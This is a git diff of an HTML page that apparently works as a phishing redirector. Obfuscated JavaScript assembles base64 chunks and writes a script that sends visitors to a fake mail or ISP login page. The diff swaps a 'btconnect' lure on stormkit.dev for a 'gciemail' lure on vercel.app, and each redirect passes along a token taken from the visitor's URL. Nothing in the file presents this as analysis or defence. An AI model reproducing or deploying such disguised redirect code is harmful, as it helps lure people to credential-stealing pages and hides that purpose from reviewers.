--- a/index.html
+++ b/index.html
@@ -2,21 +2,21 @@
     <!DOCTYPE html>
     <html>
     <head>
-        <title>Portal</title>
+        <title>Next</title>
     </head>
     <body>
         
     <script>
         (function() {
-            const Gj0N4Bo2 = [
-                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKAoJI', 'CAiaHR0cHM6Ly9idGNvbm5lY3QtbGIzOTNhYzE5MGNmYTJmYT', 'BlYzBhOTVlNWQwYzYzY2YxODRhOTgzYzRkOGVhZGZiYWNlLnN', '0b3Jta2l0LmRldi9idC5odG1sP2NsaWVudD1XOTU1TEFBMUdp', 'UmRUN3o0TzVrYnA5Z2diV0Z6R1ZGRExSNjU4VFY5Y2x2aEpUY', '1B5VXdWNG9OUHpIdkU5Rm02TWxEeTlJSlV1aHk3aUNIaHZOS1', 'N6bjc3REdueHpWbGxDUDNrNTcyT1NQSk0xVDM2MTNYTFYwTUF', 'ZMzk4IyIgKwoJCWF0b2IobmV3IFVSTFNlYXJjaFBhcmFtcyh3', 'aW5kb3cubG9jYXRpb24uc2VhcmNoKS5nZXQoInRva2VuIikpC', 'gkpOwogIDwvc2NyaXB0Pg=='
+            const xGwc0xhj = [
+                'PHNjcmlwdD4KCXdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKAoJIC', 'AiaHR0cHM6Ly9nY2llbWFpbC1iMzkzYWMxOTBjZmEyZmEwZWMw', 'YTk1ZTVkMGM2M2NmMTg0YTk4M2M0ZDhlYWRmYmFjLnZlcmNlbC', '5hcHAvZ2NpZW1haWwuaHRtbD9jbGllbnQ9Vzk1NUxBQTFHaVJk', 'VDd6TzVrYnA5Z2diV0Z6R1ZGTFI2NThUVjljbHZoSlRjUHlVd1', 'Y0b05Qekh2RTlGbTZNbER5OUlKVXVoeTdpQ0hodk5LU3puNzdE', 'R254elZsbENQM2s1NzJPU1BKTTFUMzYxM1hMVjBNQVkzOTgjIi', 'ArCgkJYXRvYihuZXcgVVJMU2VhcmNoUGFyYW1zKHdpbmRvdy5s', 'b2NhdGlvbi5zZWFyY2gpLmdldCgidG9rZW4iKSkKCSk7CiAgPC', '9zY3JpcHQ+'
             ];
-            let j1dD6q0Z = "";
-            for (let chunk of Gj0N4Bo2) {
-                j1dD6q0Z += chunk;
+            let sLcCqWKq = "";
+            for (let chunk of xGwc0xhj) {
+                sLcCqWKq += chunk;
             }
-            const MIEQiY8S = atob(j1dD6q0Z);
-            document.write(MIEQiY8S);
+            const ewb3cC56 = atob(sLcCqWKq);
+            document.write(ewb3cC56);
         })();
     </script>
     
